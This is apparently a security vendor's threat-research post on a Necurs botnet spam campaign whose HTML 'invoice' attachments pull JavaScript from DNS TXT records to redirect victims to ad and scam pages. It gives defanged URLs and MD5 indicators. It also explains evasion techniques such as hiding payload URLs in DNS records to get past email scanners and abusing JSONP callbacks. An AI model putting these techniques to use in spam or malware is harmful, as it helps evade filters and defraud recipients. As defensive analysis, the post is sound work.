Recently we noticed the Necurs botnet launching a small spam campaign with a HTML redirector as an attachment. The HTML is crafted to perform a DNS query to the spammer’s domain, obtain the DNS TXT Record and execute data within that record. This leads to redirection to unwanted advertisements and scam webpages. This is the first time we have seen this botnet delve into this strategy.
The emails spammed by Necurs had a subject “Delivery <Number>”. The email body is obfuscated using Cyrillic characters.
The emails have a single attachment named “invoic-<random alphanumeric>.html”. There are two versions of the HTML – one which renders a simple text that reads “Loading…” and executes a query to Google Public DNS, while the other type, without rendered text, uses JSONDNS for redirection. Let's delve into the analysis of these files below.
Attachment Type 1: Using Google Public DNS
The HTML attachment has a meta and script tag. The content of the meta tag contains some JavaScript which will be executed through the script tag. The JavaScript performs a DNS query on the spammer’s domain and obtains the DNS TXT Record – machine-readable data about the domain. The data entry obtained from the DNS response will, in turn, be executed.
The HTML “invoic-B2448B.html” shown in Figure 1 and 2 contains a script tag that utilizes Google’s OAuth 2.0 API revokeToken function to execute the obfuscated JavaScript found inside the meta tag.
When the HTML attachment is executed, the Google API revokeToken() via the script URL hxxp://accounts[.]google[.]com/o/oauth2/revoke?callback=ccc() will execute the function “ccc” inside the JavaScript. This function will first perform a DNS query via Google Public DNS using the decrypted URL at var v and retrieve its DNS TXT Record. Then, it will execute the 0xD entry of the DNS TXT Record which is the data entry.
In figure 3, the data entry contains the JavaScript code that will launch hxxp://www[.]21732bfg36abp[.]kellogglawassociatesp[.]com/30098.html via the windows.location.replace command. This chain of events ultimately leads to the browser redirecting to an unwanted advertisement webpage.
Attachment Type 2: Using opensource JSONDNS
The other type of HTML attachment is simpler and smaller by using JSONDNS, an opensource DNS Service platform that performs DNS queries via HTTP.
In Figure 4, the HTML attachment "invoic-9094.html” directly performs the DNS query at the script tag, then retrieves and passes the DNS TXT Record to the JavaScript function jsonp(json).
The content of the rdata entry is a windows.location.replace JavaScript command. To execute this is the sole function of function jsonp(json).
Unfortunately for this HTML sample, the browser will not be able to display the intended URL as the command windows.location.replace is called twice. The URL in the browser will be replaced with the value of the rdata entry.
Conclusion
Necurs is still sending out spam campaigns from time to time, although the output from this botnet is now sporadic and small in volume. Though this campaign is low in volume, it is significant since it shows that the people behind this botnet are trying out new stuff. Now, they are exploring the world of DNS and have utilized the DNS TXT Record to hide the malicious/unwanted URLs from the email gateway scanners. Furthermore, they tried out the opensource JSONDNS which has support on cross-domain access (bypasses the same-origin-policy security model). Perhaps the operators are at an early stage of development of this type of spam campaign. The payload for many previous Necurs campaigns was malware, and it would not take much for the payload to switch from ‘harmless’ advertising to something more sinister.
While new to Necurs, the use of DNS TXT Record strategy is not new. For example, we observed that the Carbanak campaign last April 2017 also uses DNS TXT Record to obtain and execute the malware on the compromised system.
IOCs
invoic-B2448B.html MD5=78809ebe7b7439cb7b3377284e656258
invoic-9094.html MD5=02f16039651a529f1f7eceb53aecd126